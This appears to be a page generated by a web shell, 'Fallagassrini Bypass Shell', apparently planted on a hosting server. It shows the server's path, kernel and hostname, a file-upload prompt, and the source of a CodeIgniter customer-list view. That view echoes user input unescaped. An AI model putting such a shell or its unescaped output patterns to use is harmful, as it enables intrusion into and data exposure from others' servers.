? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/sgms/draft/application/views/Customer/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/sgms/draft/application/views/Customer/view_customer.php

<?php  if ( ! defined('BASEPATH')) exit('No direct script access allowed');?>

<div class="select-bar">
    <label>
        <img src="<?=base_url()?>assets/images/add-icon.png" title="Add New" class="clickimage" onclick="addformdisplay('add_customer','Customer')" alt="Add New" align = "center" width="25" height="25"  />
    </label>
</div>

<div id="searchdiv">
    <?php
        $attributes=array('id'=>'searchvalidateform','class'=>'customForm');
        echo form_open('customer/viewincustomersearch/search_customer/view_customer/1',$attributes);
        if(isset($_SESSION['searchdata']))
        {
            $searchdata=$_SESSION['searchdata'];
            if(!empty($searchdata))
            {
                $searchtext=$searchdata['searchtext'];
                $searchfield=$searchdata['searchopt'];
            }
            else
            {
                $searchtext = "";
                $searchfield = "";
            }
        }
        else
        {
            $searchtext = "";
            $searchfield = "";
        }
    ?>

        Search For &nbsp;&nbsp;
        <input type="text" name="searchtext" id="searchtext" value="<?=$searchtext;?>"> &nbsp;&nbsp; In
        <select name="searchopt" id="searchopt">
             <option value="username">Select</option>
             <option <?php if ($searchfield == "customer_name") echo "selected"; ?> value="customer_name">Customer Name</option>
             <option <?php if ($searchfield == "customer_no") echo "selected"; ?> value="customer_no">Customer ID</option>
             <option <?php if ($searchfield == "customer_email") echo "selected"; ?> value="customer_email">Email</option>
             <option <?php if ($searchfield == "customer_city") echo "selected"; ?> value="customer_city">City</option>
             <option <?php if ($searchfield == "customer_status") echo "selected"; ?> value="customer_status">Status</option>
        </select>
        <input type="submit" id="button1" onclick="addformdata('searchvalidateform')" class="clickimage" value="Search"/>
    <?php
        echo form_close();
    ?>
</div>


<table class="sort" cellpadding="0" cellspacing="0">
<caption>Customer</caption>
    <thead>
        <tr>
        <th width="25px">S.No</th>
        <th>Customer ID</th>
        <th>Customer Name</th>
        <th>Contact No</th>
        <th>Fax</th>
        <th>Email</th>
        <th width="20%">Action</th>
        </tr>
    </thead>
    <tbody>

    <?php
        if ($viewinfo->num_rows() > 0)
        {
            $table="software_proposal~training_proposal_details~training_quotation";
            $field="customer_id~customer_id~customer_id";
            $z=1;             $i=($pagenum-1)*10;
            foreach ($viewinfo->result() as $row)
            {
                if($z%2==0)
                    $alt="alt";
                else
                    $alt="alt1";
    ?>
        <tr class="<?=$alt;?>">
            <td><?=++$i;?></td>
            <td><?=$row->customer_no;?></td>
            <td><a href="#"  onclick="displayformdata('customer','single_customer','<?=$row->customer_id;?>','customer','customer_id','single_customer')"><?=$row->customer_name;?></a></td>
            <td><?=$row->customer_contact_no;?></td>
            <td><?=$row->customer_fax;?></td>
            <td><?=$row->customer_email;?></td>
            <td>
                <div id="console_fronticons">
                    <div class="fronticons">
                        <a class="inliexample2" href="#"  onclick="showuploaddiv('<?=$row->customer_id;?>')" ><img src="<?=base_url()?>assets/images/upload.png"  title="Upload File" width="20" height="20" alt="Upload" align = "center" class="clickimage" onclick="showuploaddiv('<?=$row->customer_id;?>')"  /></a>
                    </div>
                    <div class="fronticons">
                        <img src="<?=base_url()?>assets/images/edit-icon.gif"  title="Edit" width="20" height="20" alt="Edit" align = "center" class="clickimage" onclick="editformdata('customer','edit_customer','<?=$row->customer_id;?>','customer','customer_id','edit_customer')" alt="" />
                    </div>
                    <div class="fronticons">
                        <img src="<?=base_url()?>assets/images/delete-icon.png"  title="Delete" width="20" height="20" onclick="deletedata('customer',<?=$row->customer_id;?>,'customer_id','customer','viewincustomersearch','search_customer','view_customer','<?=$table?>','<?=$field?>')" alt="Delete" align = "center"/>
                    </div>
                </div>
            </td>
    <?php
                $z++;

            }
            ?>
        </tr>
    <?php
        }
    ?>
    </tbody>
</table>
<div style='display:none'>
    <div id="uploaddiv"></div>
</div>
                
<div id="pager">
    <ul id="pagination-digg">
        <li <?php if($pagenum>1){ ?>class="previous" <?php } else { ?> class="previous-off" <?php } ?> >
         <?php if($pagenum>1){ ?><a href="#" onclick="viewdata('customer','viewincustomersearch','search_customer','view_customer',<?=$pagenum-1?>);" > <?php } ?>
         «Previous
         </a>
        </li>

        <?php
            //Pagination Numbers
            for($i=$startpage; $i<=$endpage; $i++)
            {
                if($pagenum==$i )
                {
        ?>
                    <li class="active" ><?=$i?></li>
        <?php
                }
                else
                {
        ?>
                    <li><a href="#" onclick="viewdata('customer','viewincustomersearch','search_customer','view_customer',<?=$i?>);"><?=$i?></a></li>
        <?php
                }
            }
        ?>
        <li <?php if($pagenum<$endpage){ ?>  class="next" <?php } else { ?> class="next-off" <?php } ?>>
            <?php if($pagenum<$endpage){ ?><a href="#" onclick="viewdata('customer','viewincustomersearch','search_customer','view_customer',<?=$pagenum+1?>);"> <?php } ?> Next » </a>
        </li>
   </ul>
</div>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net